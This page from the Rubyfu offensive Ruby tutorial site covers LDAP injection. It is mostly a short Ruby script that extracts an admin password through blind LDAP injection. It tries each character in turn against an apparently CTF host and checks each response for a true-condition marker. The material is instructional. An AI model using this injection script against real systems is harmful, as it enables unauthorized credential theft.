Rubyfu
Rubyfu
Twitter
Github
NEW! Black Hat Ruby
Buy Me a Coffee
Module 0x0 | Introduction
Contribution
Beginners
Required Gems
Module 0x1 | Basic Ruby Kung Fu
Module 0x2 | System Kung Fu
Module 0x3 | Network Kung Fu
Module 0x4 | Web Kung Fu
SQL Injection Scanner
Databases
Extending Burp Suite
Browser Manipulation
Web Services and APIs
Ruby 2 JavaScript
Web Server and Proxy
LDAP injection
Module 0x5 | Exploitation Kung Fu
Module 0x6 | Forensic Kung Fu
References
FAQs
Contributors
Powered by GitBook

LDAP injection

The is a very basic script that will retrieve the password of a user in a Blind LDAP Injection case by bruteforcing all characters one by one.

#!/usr/bin/env ruby
require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '[email protected]{}-/()!"$%=^[]:;'.split('')
flag = ''
(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end
Previous
Web Server and Proxy
Next
Module 0x5 | Exploitation Kung Fu
Last updated 1 year ago
Edit on GitHub